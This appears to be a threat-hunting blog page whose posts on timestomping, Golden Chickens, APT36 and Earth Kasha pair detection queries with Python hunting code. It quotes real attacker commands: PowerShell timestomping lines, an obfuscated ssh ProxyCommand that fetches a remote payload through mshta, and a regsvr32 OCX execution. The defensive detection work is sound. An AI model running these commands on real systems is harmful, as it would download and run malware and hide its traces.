Posts

Showing posts from May, 2025

124. That's How Adversaries Abuse PowerShell for Timestomping

Hello everyone! Still adding interesting items to my PowerShell collection! This morning I was reading this report and spotted another in-the-wild (ITW) example of PowerShell being abused for timestomping. The adversary created scheduled tasks to execute MeshAgent, and afterwards ran PowerShell commands to timestomp the related files. Here are some examples:

(Get-Item ".\vcruntime140_1.dll").LastAccessTime=("12 May 2024 11:14:00")
(Get-Item ".\vcruntime140_1.dll").LastWriteTime=("12 May 2024 11:14:00")
(Get-Item ".\vcruntime140_1.dll").CreationTime=("12 May 2024 11:14:00")
(Get-Item ".\vcruntime140.dll").LastAccessTime=("12 May 2024 11:14:00")
(Get-Item ".\vcruntime140.dll").LastWriteTime=("12 May 2024 11:14:00")
(Get-Item ".\vcruntime140.dll").CreationTime=("12 May 2024 11:14:00")

Each line assigns a string to a timestamp property of the FileInfo object returned by Get-Item (PowerShell converts the string to a DateTime), and the same value is written to all three attributes. For example, we can use ScriptBlock events to hunt for Get-Item cmdlet abuse: event_type: "ScriptExecutionWin" AND script_text: "get-item" AND ("lastaccesstime" OR "lastwr...
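As an added example (my own code, not from the post or from the report it discusses), here is the hunting idea above expressed as detection logic in Python, run over constructed ScriptBlockText values of the kind PowerShell Operational log Event ID 4104 carries. It goes beyond the Get-Item pattern the query keys on to the other ways a script can write a file timestamp: a property assignment on any object (including one held in a variable), the [System.IO.File] / [System.IO.Directory] static setters, and Set-ItemProperty. The sample script blocks are constructed for the example; the regex semantics are mine, not the query language's.

```python
import re

# Constructed ScriptBlockText samples (what Event ID 4104 would carry).
# The first two mirror the commands quoted in the post; the rest are my own
# variants an analyst should expect to see. None of this is real telemetry.
SAMPLE_SCRIPT_BLOCKS = [
    '(Get-Item ".\\vcruntime140_1.dll").LastWriteTime=("12 May 2024 11:14:00")',
    '(Get-Item ".\\vcruntime140_1.dll").CreationTime=("12 May 2024 11:14:00")',
    # same technique, but "get-item" never appears next to the property
    '$f = Get-ChildItem C:\\Windows\\Temp\\agent.exe; $f.LastWriteTime = "2019-01-01"',
    # .NET static setter, no cmdlet at all
    '[System.IO.File]::SetCreationTime("C:\\Windows\\Temp\\agent.exe", "2019-01-01")',
    # provider path through Set-ItemProperty
    'Set-ItemProperty -Path C:\\Windows\\Temp\\agent.exe -Name LastAccessTime -Value "2019-01-01 08:00:00"',
    # benign: reading the property in a comparison, and sorting by it
    '(Get-Item C:\\Windows\\System32\\kernel32.dll).LastWriteTime -lt (Get-Date)',
    'Get-ChildItem C:\\Temp | Sort-Object LastWriteTime',
]

_PROPS = r"(LastWriteTime|CreationTime|LastAccessTime)(Utc)?"

# 1. Property write on any object: (Get-Item x).LastWriteTime=... or $f.CreationTime = ...
#    A read such as '.LastWriteTime -lt ...' has no '=' after the property and does not match.
PROPERTY_ASSIGN = re.compile(r"\." + _PROPS + r"\s*=(?!=)", re.IGNORECASE)
# 2. .NET static setters: [System.IO.File]::SetLastWriteTime(path, time); Directory and Utc variants too
DOTNET_SETTER = re.compile(
    r"\[(?:System\.)?IO\.(?:File|Directory)\]::Set" + _PROPS + r"\s*\(", re.IGNORECASE)
# 3. Set-ItemProperty -Path x -Name LastWriteTime -Value ...
SET_ITEMPROPERTY = re.compile(
    r"Set-ItemProperty\b[^;\n]*?-Name\s+['\"]?" + _PROPS, re.IGNORECASE)
# The last quoted literal after the match is the timestamp the attacker chose.
LITERAL = re.compile(r"""['"]([^'"]+)['"]""")

TECHNIQUES = (
    ("property-assignment", PROPERTY_ASSIGN),
    ("dotnet-setter", DOTNET_SETTER),
    ("set-itemproperty", SET_ITEMPROPERTY),
)


def hunt_timestomping(script_blocks):
    """Return one finding per script block that writes a file timestamp.

    Each finding records the technique, the timestamp attribute touched and
    the last quoted literal after the match (the spoofed value, where present).
    """
    findings = []
    for text in script_blocks:
        for technique, pattern in TECHNIQUES:
            match = pattern.search(text)
            if not match:
                continue
            literals = LITERAL.findall(text[match.end():])
            findings.append({
                "technique": technique,
                "property": match.group(1),   # group 1 of _PROPS, the attribute name
                "value": literals[-1] if literals else None,
                "script": text,
            })
            break  # one finding per block is enough for triage
    return findings


if __name__ == "__main__":
    for hit in hunt_timestomping(SAMPLE_SCRIPT_BLOCKS):
        print(f'{hit["technique"]:20} {hit["property"]:15} -> {hit["value"]}')
```

The page's query keys on the literal get-item string plus the attribute names; the patterns above key on the write itself, so the same action routed through a variable, Set-ItemProperty or the .NET setters still surfaces, while reads in comparisons and Sort-Object (common in admin scripts) stay out of the results. The extracted value is worth keeping in the alert: a timestamp years older than the file's $STANDARD_INFORMATION change time is the usual giveaway.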

123. Hunting for Golden Chickens' New Malware

Hello everyone! Insikt Group uncovered two new malware families: TerraStealerV2 and TerraLogger. Both were attributed to the threat actor known as Golden Chickens, which operates a Malware-as-a-Service (MaaS) platform and provides its tools to other criminals. I've looked through the report and (as always) caught a few detection and hunting opportunities. For example, the adversary abused ssh.exe to proxy PowerShell execution through its ProxyCommand option, which ssh hands to a shell to run:

ssh.exe" -o ProxyCommand="powershell powershell ('datashieldsecure.com nikbfgppdkfjsfj msh ta run.mp4 http:'|Convert-String -E '1 2 3 4 5 6=34 6//1/2/5')"

We can hunt for similar activity using the following query:

event_type: "processcreatewin" AND proc_file_name: "ssh.exe" AND cmdline: "proxycommand"

Next thing, abusing regsvr32.exe to execute a malicious OCX file, silently (/s) and via the DllInstall entry point (/i):

regsvr32.exe /s /i C:\Users\[redacted]\AppData\Local\Temp\2549828850.ocx

We can use the following query to hunt for OCX...

122. APT36 Abuses PowerPoint PPAM Files to Deliver Crimson RAT

Hello everyone! We've already talked about how adversaries abuse PowerPoint to deliver malware a few times. It's time to discuss it again! Seqrite has published a report on APT36 (we track this activity cluster as Translucent Werewolf) activity. According to this research, the threat actors leveraged PowerPoint add-in files (PPAM, the macro-enabled add-in format, so the file can carry VBA) to deliver Crimson RAT. My observations suggest that such files are not very common in modern environments, so we can hunt for PPAM opening events:

event_type: "processcreatewin" AND proc_file_name: "powerpnt.exe" AND cmdline: "ppam"

See you tomorrow!

121. Detecting Earth Kasha's ROAMINGMOUSE

Hello everyone! Reading Trend Micro's report on Earth Kasha, I spotted a curious behavior marker of ROAMINGMOUSE: it abuses WMI to execute JSLNTOOL.EXE via explorer.exe. JSLNTOOL.EXE is a legitimate application that the adversary uses to sideload JSFC.dll, a malicious loader. At logon explorer.exe is started by userinit.exe, so a WMI provider host as its parent is unusual. This means we can hunt for suspicious executions of explorer.exe via wmiprvse.exe:

event_type: "processcreatewin" AND proc_file_path: "explorer.exe" AND proc_p_file_path: "wmiprvse.exe"

As for JSLNTOOL.EXE, you can also hunt for related execution events, focusing on uncommon locations. The query keys on the OriginalFileName from the version resource, which survives a rename on disk, and excludes the vendor's install path:

event_type: "processcreatewin" AND proc_file_originalfilename: "jslntool.exe" AND NOT proc_file_path: "justsystems"

See you tomorrow!
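As an added example covering the process-creation hunts in posts 123, 122 and 121 (my own code, not the blog's and not from any of the vendor reports), here is a small evaluator for the query shape those hunts are written in (field: "value" terms joined by AND / OR / NOT, with parentheses), run over constructed process-creation events laid out with the same field names. The events, paths and parents are invented for the example (the malicious command lines mirror the posts; the JustSystems install path is a guess); a term is treated as a case-insensitive substring match, which is an assumption about the platform's semantics. The regsvr32/OCX query on the page is cut off, so Q_OCX below is my own, not the author's.

```python
import re

# Constructed process-creation events in the field layout the queries above
# use. Paths, parents and command lines are invented for the example (the
# malicious ones mirror the posts); the JustSystems install path is a guess.
def _ev(eid, name, path, parent, cmdline, orig=None):
    return {"id": eid, "event_type": "processcreatewin", "proc_file_name": name, "proc_file_path": path,
            "proc_p_file_path": parent, "proc_file_originalfilename": orig or name, "cmdline": cmdline}

OPENSSH = r"C:\Windows\System32\OpenSSH\ssh.exe"
PPT = r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"
EXPLORER = r"C:\Windows\explorer.exe"
EVENTS = [
    _ev(1, "ssh.exe", OPENSSH, r"C:\Windows\System32\cmd.exe",
        r'''ssh.exe -o ProxyCommand="powershell powershell ('datashieldsecure.com nikbfgppdkfjsfj msh ta run.mp4 http:'|Convert-String -E '1 2 3 4 5 6=34 6//1/2/5')"'''),
    _ev(2, "ssh.exe", OPENSSH, r"C:\Windows\System32\cmd.exe", "ssh.exe admin@jumphost"),
    _ev(3, "regsvr32.exe", r"C:\Windows\System32\regsvr32.exe", EXPLORER,
        r"regsvr32.exe /s /i C:\Users\[redacted]\AppData\Local\Temp\2549828850.ocx"),
    _ev(4, "regsvr32.exe", r"C:\Windows\System32\regsvr32.exe", r"C:\Windows\System32\msiexec.exe",
        r"regsvr32.exe /s C:\Program Files\Vendor\vendor.dll"),
    _ev(5, "powerpnt.exe", PPT, EXPLORER, r'"POWERPNT.EXE" "C:\Users\user\Downloads\report.ppam"'),
    _ev(6, "powerpnt.exe", PPT, EXPLORER, r'"POWERPNT.EXE" "C:\Users\user\Downloads\report.pptx"'),
    _ev(7, "explorer.exe", EXPLORER, r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        r"explorer.exe C:\Users\Public\JSLNTOOL.EXE"),               # WMI-spawned: suspicious
    _ev(8, "explorer.exe", EXPLORER, r"C:\Windows\System32\userinit.exe", r"C:\Windows\Explorer.EXE"),  # logon
    _ev(9, "jslntool.exe", r"C:\Users\Public\JSLNTOOL.EXE", EXPLORER,
        r"C:\Users\Public\JSLNTOOL.EXE", orig="JSLNTOOL.EXE"),      # sideload staging directory
    _ev(10, "jslntool.exe", r"C:\Program Files\JustSystems\Common\JSLNTOOL.EXE", EXPLORER,
        r'"C:\Program Files\JustSystems\Common\JSLNTOOL.EXE"', orig="JSLNTOOL.EXE"),
]

# Minimal evaluator for the query shape used above: field: "value" terms,
# AND / OR / NOT and parentheses. A term is a case-insensitive substring
# match on the field, which is an assumption about the platform's semantics.
_TOKEN = re.compile(r'\s*(\(|\)|AND\b|OR\b|NOT\b|(\w+)\s*:\s*"([^"]*)")')

def tokenize(query):
    query, pos, tokens = query.strip(), 0, []
    while pos < len(query):
        m = _TOKEN.match(query, pos)
        if not m:
            raise ValueError(f"cannot tokenize: {query[pos:]!r}")
        pos = m.end()
        tokens.append(("TERM", m.group(2), m.group(3)) if m.group(2) else (m.group(1),))
    return tokens

def parse(tokens):
    """Recursive descent with precedence NOT > AND > OR; returns a tuple tree."""
    tokens = list(tokens)  # consumed from the front
    def peek():
        return tokens[0][0] if tokens else None
    def or_expr():
        node = and_expr()
        while peek() == "OR":
            tokens.pop(0)
            node = ("OR", node, and_expr())
        return node
    def and_expr():
        node = unary()
        while peek() == "AND":
            tokens.pop(0)
            node = ("AND", node, unary())
        return node
    def unary():
        tok = tokens.pop(0) if tokens else (None,)
        if tok[0] == "NOT":
            return ("NOT", unary())
        if tok[0] == "(":
            node = or_expr()
            if peek() != ")":
                raise ValueError("missing ')'")
            tokens.pop(0)
            return node
        if tok[0] != "TERM":
            raise ValueError(f"unexpected token {tok[0]}")
        return tok
    tree = or_expr()
    if tokens:
        raise ValueError(f"trailing tokens: {tokens}")
    return tree

def evaluate(node, event):
    kind = node[0]
    if kind == "TERM":
        return node[2].lower() in str(event.get(node[1], "")).lower()
    if kind == "NOT":
        return not evaluate(node[1], event)
    left, right = evaluate(node[1], event), evaluate(node[2], event)
    return (left and right) if kind == "AND" else (left or right)

def hunt(query, events):
    """Return the ids of the events the query matches."""
    tree = parse(tokenize(query))
    return [e["id"] for e in events if evaluate(tree, e)]

# The queries quoted in the posts; Q_OCX is my own, the page's version is cut off.
Q_SSH = 'event_type: "processcreatewin" AND proc_file_name: "ssh.exe" AND cmdline: "proxycommand"'
Q_OCX = 'event_type: "processcreatewin" AND proc_file_name: "regsvr32.exe" AND cmdline: ".ocx"'
Q_PPAM = 'event_type: "processcreatewin" AND proc_file_name: "powerpnt.exe" AND cmdline: "ppam"'
Q_EXPLORER = 'event_type: "processcreatewin" AND proc_file_path: "explorer.exe" AND proc_p_file_path: "wmiprvse.exe"'
Q_JSLNTOOL = 'event_type: "processcreatewin" AND proc_file_originalfilename: "jslntool.exe" AND NOT proc_file_path: "justsystems"'
```

Running hunt(Q_EXPLORER, EVENTS) returns only the WMI-spawned explorer.exe (event 7) and leaves the normal userinit.exe-parented logon instance alone; hunt(Q_JSLNTOOL, EVENTS) keeps the copy in C:\Users\Public and drops the one under the vendor path because the NOT term excludes "justsystems" from proc_file_path. Before alerting on the explorer.exe rule in production, baseline it: administration tooling that creates processes through Win32_Process.Create produces the same parent.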